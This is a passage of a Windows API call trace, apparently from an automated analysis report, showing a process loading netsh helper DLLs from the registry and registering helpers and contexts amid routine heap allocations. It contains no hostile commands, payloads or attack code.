lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="p2pnetsh", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0143.163] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0143.163] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0143.163] GetProcessHeap () returned 0x150000 [0143.163] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x2f8) returned 0x197f60 [0143.163] GetProcessHeap () returned 0x150000 [0143.163] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x12) returned 0x1906c0 [0143.163] GetProcessHeap () returned 0x150000 [0143.163] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x1a3950 [0143.163] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0143.163] GetProcessHeap () returned 0x150000 [0143.163] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1a3370 | out: hHeap=0x150000) returned 1 [0143.163] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x7fef4190000 [0150.043] GetProcAddress (hModule=0x7fef4190000, lpProcName="InitHelperDll") returned 0x7fef4195568 [0150.043] InitHelperDll () returned 0x0 [0150.043] RegisterHelper () returned 0x0 [0150.043] GetProcessHeap () returned 0x150000 [0150.043] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe18) returned 0x1aae40 [0150.044] GetProcessHeap () returned 0x150000 [0150.044] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1a4e50 | out: hHeap=0x150000) returned 1 [0150.044] RegisterHelper () returned 0x0 [0150.044] GetProcessHeap () returned 0x150000 [0150.044] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe70) returned 0x1abc60 [0150.044] GetProcessHeap () returned 0x150000 [0150.044] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1aae40 | out: hHeap=0x150000) returned 1 [0150.044] RegisterHelper () returned 0x0 [0150.044] GetProcessHeap () returned 0x150000 [0150.044] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xec8) returned 0x1acae0 [0150.045] GetProcessHeap () returned 0x150000 [0150.045] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1abc60 | out: hHeap=0x150000) returned 1 [0150.045] RegisterHelper () returned 0x0 [0150.045] GetProcessHeap () returned 0x150000 [0150.045] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xf20) returned 0x1aae40 [0150.045] GetProcessHeap () returned 0x150000 [0150.045] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1acae0 | out: hHeap=0x150000) returned 1 [0150.045] RegisterHelper () returned 0x0 [0150.045] GetProcessHeap () returned 0x150000 [0150.045] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xf78) returned 0x1abd70 [0150.045] GetProcessHeap () returned 0x150000 [0150.045] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1aae40 | out: hHeap=0x150000) returned 1 [0150.045] RegisterHelper () returned 0x0 [0150.045] GetProcessHeap () returned 0x150000 [0150.045] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xfd0) returned 0x1accf0 [0150.045] GetProcessHeap () returned 0x150000 [0150.045] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1abd70 | out: hHeap=0x150000) returned 1 [0150.045] RegisterHelper () returned 0x0 [0150.045] GetProcessHeap () returned 0x150000 [0150.045] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1028) returned 0x1aae40 [0150.046] GetProcessHeap () returned 0x150000 [0150.046] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1accf0 | out: hHeap=0x150000) returned 1 [0150.046] RegisterHelper () returned 0x0 [0150.046] GetProcessHeap () returned 0x150000 [0150.046] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1080) returned 0x1abe70 [0150.046] GetProcessHeap () returned 0x150000 [0150.046] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1aae40 | out: hHeap=0x150000) returned 1 [0150.046] RegisterHelper () returned 0x0 [0150.046] GetProcessHeap () returned 0x150000 [0150.046] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10d8) returned 0x1acf00 [0150.046] GetProcessHeap () returned 0x150000 [0150.046] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1abe70 | out: hHeap=0x150000) returned 1 [0150.046] RegisterHelper () returned 0x0 [0150.046] GetProcessHeap () returned 0x150000 [0150.047] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1130) returned 0x1adfe0 [0150.047] GetProcessHeap () returned 0x150000 [0150.047] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1acf00 | out: hHeap=0x150000) returned 1 [0150.047] RegEnumValueW (in: hKey=0x90, dwIndex=0x12, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="wwancfg", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0150.047] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0150.047] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0150.047] GetProcessHeap () returned 0x150000 [0150.047] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x320) returned 0x19da60 [0150.047] GetProcessHeap () returned 0x150000 [0150.047] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x190720 [0150.047] GetProcessHeap () returned 0x150000 [0150.047] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x190700 [0150.047] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0150.047] GetProcessHeap () returned 0x150000 [0150.047] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x197f60 | out: hHeap=0x150000) returned 1 [0150.047] LoadLibraryW (lpLibFileName="WWANCFG.DLL") returned 0x7fef4130000 [0150.514] GetProcAddress (hModule=0x7fef4130000, lpProcName="InitHelperDll") returned 0x7fef41320c8 [0150.514] InitHelperDll () returned 0x0 [0150.515] RegisterHelper () returned 0x0 [0150.515] GetProcessHeap () returned 0x150000 [0150.515] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1188) returned 0x1aae40 [0150.515] GetProcessHeap () returned 0x150000 [0150.515] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1adfe0 | out: hHeap=0x150000) returned 1 [0150.515] RegEnumValueW (in: hKey=0x90, dwIndex=0x13, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="wlancfg", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0150.515] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0150.515] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0150.515] GetProcessHeap () returned 0x150000 [0150.515] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x348) returned 0x1a4e50 [0150.515] GetProcessHeap () returned 0x150000 [0150.515] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x19ce80 [0150.515] GetProcessHeap () returned 0x150000 [0150.515] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x19cec0 [0150.515] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0150.515] GetProcessHeap () returned 0x150000 [0150.515] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19da60 | out: hHeap=0x150000) returned 1 [0150.515] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x7fef3a20000 [0152.742] GetProcAddress (hModule=0x7fef3a20000, lpProcName="InitHelperDll") returned 0x7fef3a2613c [0152.742] InitHelperDll () returned 0x0 [0152.742] RegisterHelper () returned 0x0 [0152.742] GetProcessHeap () returned 0x150000 [0152.742] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x11e0) returned 0x1acfd0 [0152.742] GetProcessHeap () returned 0x150000 [0152.742] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1aae40 | out: hHeap=0x150000) returned 1 [0152.742] RegEnumValueW (in: hKey=0x90, dwIndex=0x14, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="peerdistsh", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0152.742] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0152.742] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0152.742] GetProcessHeap () returned 0x150000 [0152.742] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x370) returned 0x1a51a0 [0152.742] GetProcessHeap () returned 0x150000 [0152.742] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x16) returned 0x19cee0 [0152.742] GetProcessHeap () returned 0x150000 [0152.742] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1e) returned 0x1a2f90 [0152.743] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0152.743] GetProcessHeap () returned 0x150000 [0152.743] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1a4e50 | out: hHeap=0x150000) returned 1 [0152.743] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x7fef3930000 [0153.607] GetProcAddress (hModule=0x7fef3930000, lpProcName="InitHelperDll") returned 0x7fef39ae69c [0153.607] InitHelperDll () returned 0x0 [0153.964] RegisterHelper () returned 0x0 [0153.964] GetProcessHeap () returned 0x150000 [0153.964] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1238) returned 0x1ae1c0 [0153.964] GetProcessHeap () returned 0x150000 [0153.964] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1acfd0 | out: hHeap=0x150000) returned 1 [0153.964] RegisterHelper () returned 0x0 [0153.964] GetProcessHeap () returned 0x150000 [0153.964] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1290) returned 0x1af400 [0154.454] GetProcessHeap () returned 0x150000 [0154.455] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ae1c0 | out: hHeap=0x150000) returned 1 [0154.455] RegCloseKey (hKey=0x90) returned 0x0 [0154.455] GetProcessHeap () returned 0x150000 [0154.455] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174260 | out: hHeap=0x150000) returned 1 [0154.455] GetProcessHeap () returned 0x150000 [0154.455] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x16e070 | out: hHeap=0x150000) returned 1 [0154.456] GetProcessHeap () returned 0x150000 [0154.456] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17df10 [0154.456] GetProcessHeap () returned 0x150000 [0154.456] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0154.456] RegisterContext () returned 0x0 [0154.459] GetProcessHeap () returned 0x150000 [0154.459] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17df90 [0154.459] GetProcessHeap () returned 0x150000 [0154.459] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0154.717] RegisterContext () returned 0x0 [0154.718] GetProcessHeap () returned 0x150000 [0154.718] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17e010 [0154.718] GetProcessHeap () returned 0x150000 [0154.718] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0154.718] RegisterContext () returned 0x0 [0154.718] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0154.718] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0154.718] GetProcessHeap () returned 0x150000 [0154.718] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x19a5a0 [0154.718] GetProcessHeap () returned 0x150000 [0154.718] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17e010 | out: hHeap=0x150000) returned 1 [0154.723] RegisterContext () returned 0x0 [0154.724] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0154.724] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0154.724] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0154.724] GetProcessHeap () returned 0x150000 [0154.724] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x150) returned 0x198c50 [0154.724] GetProcessHeap () returned 0x150000 [0154.724] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19a5a0 | out: hHeap=0x150000) returned 1 [0154.724] RegisterContext () returned 0x0 [0154.725] GetProcessHeap () returned 0x150000 [0154.725] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1c0) returned 0x1aae40 [0154.725] GetProcessHeap () returned 0x150000 [0154.725] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x198c50 | out: hHeap=0x150000) returned 1 [0154.725] RegisterContext () returned 0x0 [0154.725] GetProcessHeap () returned 0x150000 [0154.725] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x19a5a0 [0154.725] GetProcessHeap () returned 0x150000 [0154.725] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17df90 | out: hHeap=0x150000) returned 1 [0154.726] RegisterContext () returned 0x0 [0154.726] GetProcessHeap () returned 0x150000 [0154.726] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x150) returned 0x198c50 [0154.726] GetProcessHeap () returned 0x150000 [0154.726] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19a5a0 | out: hHeap=0x150000) returned 1 [0154.726] RegisterContext () returned 0x0 [0154.726] GetProcessHeap () returned 0x150000 [0154.726] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1c0) returned 0x1ab290 [0154.726] GetProcessHeap () returned 0x150000 [0154.726] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x198c50 | out: hHeap=0x150000) returned 1 [0154.726] RegisterContext () returned 0x0 [0154.726] GetProcessHeap () returned 0x150000 [0154.726] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x230) returned 0x1ab460 [0154.726] GetProcessHeap () returned 0x150000 [0154.726] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab290 | out: hHeap=0x150000) returned 1 [0155.311] RegisterContext () returned 0x0 [0155.311] GetProcessHeap () returned 0x150000 [0155.311] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x2a0) returned 0x1ab6a0 [0155.311] GetProcessHeap () returned 0x150000 [0155.311] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab460 | out: hHeap=0x150000) returned 1 [0155.311] RegisterContext () returned 0x0 [0155.311] GetProcessHeap () returned 0x150000 [0155.311] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x310) returned 0x1ab290 [0155.311] GetProcessHeap () returned 0x150000 [0155.311] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab6a0 | out: hHeap=0x150000) returned 1 [0155.311] RegisterContext () returned 0x0 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17df90 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0155.312] RegisterContext () returned 0x0 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x19a5a0 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17df90 | out: hHeap=0x150000) returned 1 [0155.312] RegisterContext () returned 0x0 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x150) returned 0x198c50 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19a5a0 | out: hHeap=0x150000) returned 1 [0155.312] RegisterContext () returned 0x0 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1c0) returned 0x1ab5b0 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x198c50 | out: hHeap=0x150000) returned 1 [0155.312] RegisterContext () returned 0x0 [0155.312] GetProcessHeap () returned 0x150000 [0155.312] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x380) returned 0x1ab780 [0155.313] GetProcessHeap () returned 0x150000 [0155.313] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab290 | out: hHeap=0x150000) returned 1 [0155.313] RegisterContext () returned 0x0 [0155.313] GetProcessHeap () returned 0x150000 [0155.313] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x3f0) returned 0x1abb10 [0155.313] GetProcessHeap () returned 0x150000 [0155.313] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab780 | out: hHeap=0x150000) returned 1 [0155.313] RegisterContext () returned 0x0 [0155.313] GetProcessHeap () returned 0x150000 [0155.313] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x460) returned 0x1b6330 [0155.313] GetProcessHeap () returned 0x150000 [0155.313] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1abb10 | out: hHeap=0x150000) returned 1 [0155.313] RegisterContext () returned 0x0 [0155.313] GetProcessHeap () returned 0x150000 [0155.313] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x4d0) returned 0x1ab780 [0155.314] GetProcessHeap () returned 0x150000 [0155.314] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1b6330 | out: hHeap=0x150000) returned 1 [0155.314] RegisterContext () returned 0x0 [0155.314] GetProcessHeap () returned 0x150000 [0155.314] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17df90 [0155.314] GetProcessHeap () returned 0x150000 [0155.314] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0155.314] RegisterContext () returned 0x0 [0155.314] GetProcessHeap () returned 0x150000 [0155.314] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x19a5a0 [0155.314] GetProcessHeap () returned 0x150000 [0155.314] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17df90 | out: hHeap=0x150000) returned 1 [0155.314] RegisterContext () returned 0x0 [0155.314] GetProcessHeap () returned 0x150000 [0155.314] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x150) returned 0x198c50 [0155.314] GetProcessHeap () returned 0x150000 [0155.314] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19a5a0 | out: hHeap=0x150000) returned 1 [0155.881] RegisterContext () returned 0x0 [0155.881] GetProcessHeap () returned 0x150000 [0155.881] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1c0) returned 0x1ab290 [0155.881] GetProcessHeap () returned 0x150000 [0155.881] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x198c50 | out: hHeap=0x150000) returned 1 [0155.881] RegisterContext () returned 0x0 [0155.881] GetProcessHeap () returned 0x150000 [0155.881] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x230) returned 0x1abc60 [0155.881] GetProcessHeap () returned 0x150000 [0155.881] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab290 | out: hHeap=0x150000) returned 1 [0156.143] RegisterContext () returned 0x0 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x2a0) returned 0x1ab290 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1abc60 | out: hHeap=0x150000) returned 1 [0156.144] RegisterContext () returned 0x0 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17df90 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0156.144] RegisterContext () returned 0x0 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x19a5a0 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17df90 | out: hHeap=0x150000) returned 1 [0156.144] RegisterContext () returned 0x0 [0156.144] RegisterContext () returned 0x0 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x310) returned 0x1abc60 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab290 | out: hHeap=0x150000) returned 1 [0156.144] RegisterContext () returned 0x0 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x380) returned 0x1b6330 [0156.144] GetProcessHeap () returned 0x150000 [0156.144] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1abc60 | out: hHeap=0x150000) returned 1 [0156.145] RegisterContext () returned 0x0 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x540) returned 0x1b66c0 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab780 | out: hHeap=0x150000) returned 1 [0156.145] RegisterContext () returned 0x0 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x5b0) returned 0x1ab780 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1b66c0 | out: hHeap=0x150000) returned 1 [0156.145] RegisterContext () returned 0x0 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x620) returned 0x1b66c0 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab780 | out: hHeap=0x150000) returned 1 [0156.145] RegisterContext () returned 0x0 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17df90 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0156.145] RegisterContext () returned 0x0 [0156.145] GetProcessHeap () returned 0x150000 [0156.145] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x690) returned 0x1ab780 [0156.146] GetProcessHeap () returned 0x150000 [0156.146] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1b66c0 | out: hHeap=0x150000) returned 1 [0156.919] RegisterContext () returned 0x0 [0156.919] GetProcessHeap () returned 0x150000 [0156.919] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x700) returned 0x1c0860 [0156.919] GetProcessHeap () returned 0x150000 [0156.919] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ab780 | out: hHeap=0x150000) returned 1 [0160.765] RegisterContext () returned 0x0 [0160.765] GetProcessHeap () returned 0x150000 [0160.765] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17e390 [0160.765] GetProcessHeap () returned 0x150000 [0160.765] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0160.771] RegisterContext () returned 0x0 [0160.771] GetProcessHeap () returned 0x150000 [0160.771] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x19ab40 [0160.771] GetProcessHeap () returned 0x150000 [0160.771] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17e390 | out: hHeap=0x150000) returned 1 [0160.771] RegisterContext () returned 0x0 [0160.771] GetProcessHeap () returned 0x150000 [0160.771] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x770) returned 0x1d6980 [0160.772] GetProcessHeap () returned 0x150000 [0160.772] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1c0860 | out: hHeap=0x150000) returned 1 [0160.772] RegisterContext () returned 0x0 [0160.772] GetProcessHeap () returned 0x150000 [0160.772] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17e390 [0160.772] GetProcessHeap () returned 0x150000 [0160.772] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0160.772] RegisterContext () returned 0x0 [0160.772] GetProcessHeap () returned 0x150000 [0160.772] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x19ac30 [0160.772] GetProcessHeap () returned 0x150000 [0160.772] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17e390 | out: hHeap=0x150000) returned 1 [0160.772] RegisterContext () returned 0x0 [0160.772] RegisterContext () returned 0x0 [0160.773] RegisterContext () returned 0x0 [0160.773] GetProcessHeap () returned 0x150000 [0160.773] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x7e0) returned 0x1d7100 [0160.773] GetProcessHeap () returned 0x150000 [0160.773] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d6980 | out: hHeap=0x150000) returned 1 [0160.797] RegisterContext () returned 0x0 [0160.797] GetProcessHeap () returned 0x150000 [0160.797] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x850) returned 0x1d7ef0 [0160.797] GetProcessHeap () returned 0x150000 [0160.797] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d7100 | out: hHeap=0x150000) returned 1 [0160.798] RegisterContext () returned 0x0 [0160.798] GetProcessHeap () returned 0x150000 [0160.798] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8c0) returned 0x1d6980 [0160.798] GetProcessHeap () returned 0x150000 [0160.798] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d7ef0 | out: hHeap=0x150000) returned 1 [0160.798] RegisterContext () returned 0x0 [0160.798] GetProcessHeap () returned 0x150000 [0160.798] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17e390 [0160.798] GetProcessHeap () returned 0x150000 [0160.798] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0161.191] RegisterContext () returned 0x0 [0161.191] GetProcessHeap () returned 0x150000 [0161.191] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x1d7f20 [0161.192] GetProcessHeap () returned 0x150000 [0161.192] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17e390 | out: hHeap=0x150000) returned 1 [0161.192] RegisterContext () returned 0x0 [0161.192] GetProcessHeap () returned 0x150000 [0161.192] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x150) returned 0x1d7250 [0161.192] GetProcessHeap () returned 0x150000 [0161.192] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d7f20 | out: hHeap=0x150000) returned 1 [0161.192] RegisterContext () returned 0x0 [0161.192] GetProcessHeap () returned 0x150000 [0161.192] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1c0) returned 0x1d73b0 [0161.192] GetProcessHeap () returned 0x150000 [0161.192] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d7250 | out: hHeap=0x150000) returned 1 [0161.192] RegisterContext () returned 0x0 [0161.192] GetProcessHeap () returned 0x150000 [0161.192] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17e390 [0161.192] GetProcessHeap () returned 0x150000 [0161.192] HeapFree (in: 